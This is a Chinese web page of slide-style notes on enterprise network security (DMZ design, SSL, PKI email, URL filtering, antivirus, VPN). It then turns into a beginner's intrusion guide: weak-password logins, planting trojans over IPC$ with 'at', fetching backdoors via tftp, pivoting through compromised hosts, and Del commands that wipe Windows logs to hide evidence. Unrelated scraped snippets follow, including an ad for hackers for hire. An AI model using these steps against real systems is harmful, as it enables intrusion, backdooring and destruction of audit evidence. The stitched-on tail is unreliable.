· || |
· || |
· 内部网(数据库)
电子商务中存在的安全问题
·1、Web服务器端
·Web应用服务器(如IIS、Apache中存在着大量的安全漏洞。用户自己开发的CGI、ASP、PH
P应用中存在着潜在的漏洞。
· 黑客通过这些漏洞攻击Web服务器,可非法篡改网页,造成恶劣影响,动摇了电子商务使
用者的信心。
· 甚至可获得Web服务器上大量的敏感资料,如用户的信用卡号,用以连接内部数据库的帐
号和口令。
· 可能通过控制Web服务器,来攻击内部数据库。
电子商务中存在的安全问题
·2、SSL协议
·SSL加密强度低。由于浏览器默认的加密模块只支持40位的低强度加密,而且即使在浏览
器中安装更高位的加密模块,由于WEB服务器不提供对高位SSL链接的支持同样无法实现高强
度SSL加密链接。
· 无法解决电子商务中的用户签名。SSL链接建立WEB服务器和用户浏览器之间的安全通道
只能保证在安全通道内的信息不被窃听或篡改,并不能对用户发送的信息进行签名以保证信
息的有效性和不可抵赖性,而这正是电子商务中必须解决的问题。
电子商务的安全解决 ***
·将WEB服务器分为两部分:一般内容的WEB服务器和交易WEB服务器。
· 一般内容的WEB服务器放置在DMZ区内,采用WEB站点监控和恢复系统保护,防止主页被非
法改动。
· 交易WEB服务器放置在内部网内,通过一台物理分隔的实时数据交换系统将其与DMZ区相
连。
· 在客户机和服务器端安装SSL *** ,从而获得128位的高强度加密通道
实时数据交换系统
·将系统外部 Web服务器和内部应用Web服务器物理隔开.
·外部Web服务器用于存放一般的信息,内部Web服 务器用于存放敏感信息,并和内部数据
库连接。
·外部用户通过http访问位于DMZ区内的一般Web服务器。
·当进行交易时,用户需访问位于内部网内的应用服务器。
·https连接首先到达实时数据交换系统的虚拟外部Web服务器,实时数据交换系统将https
协议解开,只将https连接的数据内容拷贝到虚拟内部Web服务器,虚拟内部Web服务器将使
用该数据重新发起https连接到实际的内部应用Web服务器.
·内外通过实时数据交换系统进行数据交换,无任何协议和连接穿过实时数据交换系统。
·即使DMZ区的Web服务器受到攻击, 攻击者也的不到任何有用的信息
安全电子邮件系统
·电子邮件的安全问题
·安全电子邮件的解决 ***
·一个安全邮件的使用过程
电子邮件的安全问题
·如何保证发送的敏感信息不被泄漏
·如何保证发送的信息不被篡改
·如何确认发件人的真实身份
·如何防止发件人的抵赖行为
安全电子邮件的解决 ***
·将PKI体系应用到邮件系统中
·邮件的加密和解密以实现数据的保密。
·邮件的数字签名(鉴别)实现发件人认证和不可抵赖。
·完整性校验功能防止信息传输过程中被篡改可*的安全性。
·采用公开密钥和对称密钥相结合的密钥体系。
·支持128bit对称密钥算法和1024bit公开密钥算法。
办公自动化系统的安全问题
· 如何保证发送的敏感信息不被泄漏
· 如何保证发送的信息不被篡改
· 如何确认发件人的真实身份
· 如何防止发件人的抵赖行为
安全办公自动化系统的解决 ***
·将PKI体系应用到办公自动化系统中
·工作流信息的加密和解密以实现数据保密
·工作流信息的数字签名(鉴别)实现发件人认证和不可抵赖。
·完整性校验功能防止信息传输过程中被篡改可*的安全性。
·采用公开密钥和对称密钥相结合的密钥体系
·支持128bit对称密钥算法和1024bit公开密钥算法。
Internet访问及控制系统
·Internet使用存在的问题
·Internet使用的解决 ***
·内容缓存系统
·Internet站点过滤系统
Internet访问存在的问题
·Internet接入带宽不足,访问比较慢。
·大量的用户访问相同的内容,造成带宽的进一步拥挤。
·在上班时间里大量的Internet访问是与业务无关的。
·有人使用公司的Internet系统访问 *** 。
·有人使用公司的Internet系统访问反动站点。
·管理人员无法知道Internet系统的使用情况。
Internet访问的解决 ***
· 对于问题一,采用内容缓存系统。
· 对于问题二,采用Internet 站点过滤系统。
内容缓存系统
·1、Client 发起http连接请求
·2、Proxy 收到请求后将检查内部缓存内是否有所需内容,若有,则返还给Client。
·3、若无,则Proxy根据请求向目的服务器发起请求。
·4、Web服务器将内容返回到Proxy服务器。
·5、Proxy服务器将得到的内容发回给Client,并在自己的缓存中保存一份。
Internet站点过滤系统 (一)
·1、Client 发起http连接请求
·2、连接到达防火墙时防火墙将URL送到WebSense Server 检查。
·3、WebSense 将审查结果返回到防火墙。
·4、防火墙根据其策略决定是否让该连接通过。
Internet站点过滤系统 (二)
·1、Client 发起http连接请求
·2、Proxy 受到请求后将URL送到WebSense Server检查。
·3、Proxy根据返回的结果决定是否接收该连接请求。
病毒防范系统
· 互连网时代对防病毒系统的要求
· 计算机病毒解决 ***
· 典型病毒防范系统部署
互联网时代对防病毒系统的要求
· 由于计算机的联网使用,使得病毒传播的途径大为增多: *** 文件共享、电子邮件、Int
ernet文件下载,传播速度也大为加快。
· 新病毒的出现速度加快,用户的防病毒软件的病毒特征码没能及时更新。
· 目前已出现了恶意的Java、ActiveX,当使用者浏览到包含这些代码的网页时,会造成安
全问题。
· 一些来历不明的电子邮件程序或下载的程序中带有特洛依木马,可能会造成受害者的主
机被他人控制。
计算机病毒解决 ***
· 从系统的观点考虑病毒的防范,在所有病毒传输的途径上均配置防病毒软件,如客户端
(Win98、 · Win2000)、文件服务器(NT、Netware)、邮件服务器(Exchange、Lotus
Notes)、Internet接入系统(Proxy、Firewall)等。
· 整个病毒防范系统采用集中管理的方式,病毒特征码统一更新,安全策略集中设定,从
而使得整个 *** 系统的病毒特征码得到快速更新。
· 通过在客户端的浏览器和Proxy、Firewall中嵌入病毒检查软件,来防范下在程序中带有
的病毒和可能的恶意Java、ActiveX等可执行代码的攻击。
VPN(虚拟私有网)
· 数据加密分类
· 物理线路加密
· 数据链路加密
· *** 层加密—IPSec
· 传输层加密—SSL
数据加密类型
·物理层-物理层 物理线路加密
·数据链路层-数据链路层 (路由器访问)
·在数据链路层(如PPP)进行加密 L2TP、PPTP、L2F
· *** 层- *** 层(路由器 防火墙 主机)
·在 *** 层 (如IP)进行加密 IPSec
·传输层-传输层 (对TCP进行加密 SSL)
·应用层-应用层(在应用层 (如TCP)进行加密 S/MIME、SET、SSH)
物理线路加密
· DDN 加密机
· 帧中继加密机
· 异步拨号Modem
· ISDN线路密码机
· ATM加密机
注:传输层加密
·Secure Sockets Layer (SSL) 是一个端到端的Internet 安全协议,通过采用数字证书,
它提供了数据加密、身份认证的功能。SSL建立在传输层,它为客户机和服务器在应用级建
立起一个端到断的安全会话。
·SSL *** —128位的高强度加密模块
结束语·恭喜你:
·学完这些并且可以熟练应用,已经是一个真正的 *** 安全专家了!
·希望此时的你旁边有个温柔稍有点调皮的女朋友,为这孤独而寂寞的 *** 添加一点跳动的
色彩!
黑客编:
必须要掌握的几个命令
·Net
·netsh
·Ftp
·hostname
·Telenet(nc)
·tracert
·At
·Tftp
·Netstat
·Regedit
·Ping
必须要掌握的几个协议
·http
·dns
·ftp
·Pop
·Smtp
·Icmp
·Udp
·tcp
开始
·掌握了黑客攻击的方式和手段后,那么学习黑客就简单多了!
·因为你掌握了这些,剩余的就是使用工具入侵
·熟悉掌握一套自己用的黑客工具
高级
·自己编写专用的黑客工具
·自己发现系统漏洞
黑客入侵手段
·收集信息:
· 收集要入侵的目标信息
· IP,域名,端口,漏洞,位置
弱口令
·在nt\2000\xp\2003中弱口令可以用
·Net use \ip “password” /user:user
·如果目标机开3389服务,可以直接连接
·在sql的sa弱口令,可以用sql连接器直接 ·登陆
后门木马
·如果有ipc$共享,可以copy过去木马后门
·用at启动
·AT \ip time /INTERACTIVE
·如果可以得到shell,也可以用tftp
·Tftp.exe –i ip get *.* *.*
·然后直接安装 ·如果有3389,可以自己建一个iis,下载 直接运行
密码破解
·远程破解mysql,mssql,ftp,mail,共享密码
·本地破解管理员(administrator)密码
缓冲溢出
·可以用缓冲溢出攻击,
·比如流行的webdev,rdcom模块漏洞
·可以直接得到system管理权限
·缓冲溢出后的一般现象是:
·Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32
Web服务漏洞
·例如:
·Unicode漏洞遍历磁盘和执行程序
·二次编码漏洞遍历磁盘和执行程序
·.HTR漏洞查看源代码
嗅探监听
·例如:
·针对web监听
·针对mail监听
·工具如:sinffer , iris
欺骗攻击
·例如:
·运用arp欺骗攻击
伪装欺骗
·常见的如:mail病毒
·把一个文件改名字甚至图标,欺骗对方执行
社会工程学
·例如:
· *** 聊天诱惑
·EMAIL信息
· ***
·诱惑
拒绝服务
·例如:
·Dos攻击
·Ddos攻击
利用跳板
·利用自己的肉鸡作为跳板攻击别的机器
·My PC------跳板(肉鸡)---目标
路由器漏洞
·如:
·原始密码
·程序漏洞
防火墙
·利用欺骗攻击防火墙,导致防火墙功能失效
·利用防火墙的模块漏洞
unix/linux
·NetWare Linux unix solais Solaris hp-unix Aix 等
·这些目前先不讲解
精通黑客工具
·必须有一套自己可以完全掌握的黑客工具
·如端口扫描 Nscan,bluescanport
·监听工具:sinffer iris
·telnet工具:nc
·扫描工具:sss,nmap, LANguard
·后门工具:radmin,winshell
·密码破解:lc4
·远程管理:pcanywhere
·会使用各种经典的黑客工具
清除日志
·在你入侵机器以后,离开的时候,要完全清除
·自己在那台机器上留下的痕迹
·例如清除
·Del C:\WINNT\system32\LogFiles\*.*
·Del C:\WINNT\system32\*.log
·Del C:\WINNT\system32\*.txt
·Del C:\WINNT\*.log
·Del c:\winnt\*.txt
如果你不清除日志
·当目标机器的管理员发现你的证据
·完全可以让你在大墙内渡过一段日子
黑客
·当你完全掌握这些后
·你就成为了一名小黑客
高级
·编写自己的黑客工具
·发现系统漏洞
高级黑客
·目前你足以成为一个高级黑客了
真正的黑客
·精通各种 *** 协议
·精通操作系统
·精通编程技术
·精通安全防护
·不搞破坏
·挑战技术难题
结束
中秋国庆假期的脚步越来越近,你想好去哪儿玩了吗?中新经纬客户端发现,灵活“拼假”可拥有16天的超长假期,错峰出行,单程机票可省超千元。快来看看吧! 超级“加长版”假期可连休16天 根据安排,今年国...
黑客用什么电脑最好(黑客都用什么电脑)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、黑客...
2019年时,曾有消息指出索尼成立的影视剧制作公司PlayStation Productions正在开发根据PS平台《烈火战车》改编的电视剧。最近得到的消息显示,这部影视作品已经确定了剧本和制作人。这...
龙族幻想菊之凋零异闻怎么做?看清异闻里的介绍内容,从而去找寻最准确的坐标,并将游戏时间控制好,如此才能顺利的将其完成。下面就为大家带来菊之凋零异闻触发完成攻略。 菊之凋零异闻触发完成攻略: 游...
黑客找位置真的吗相关问题 零基础黑客教程相关问题 黑客一般自称什么 怎么去曝光一个人(照片去曝光) 游戏黑客会是...
封闭windowsdefener或许将kali包参加信赖,就能够开始运用了。 12.7 01 00000000`000ab260 00000001`3fe6cdd0 windbg!WinCommand...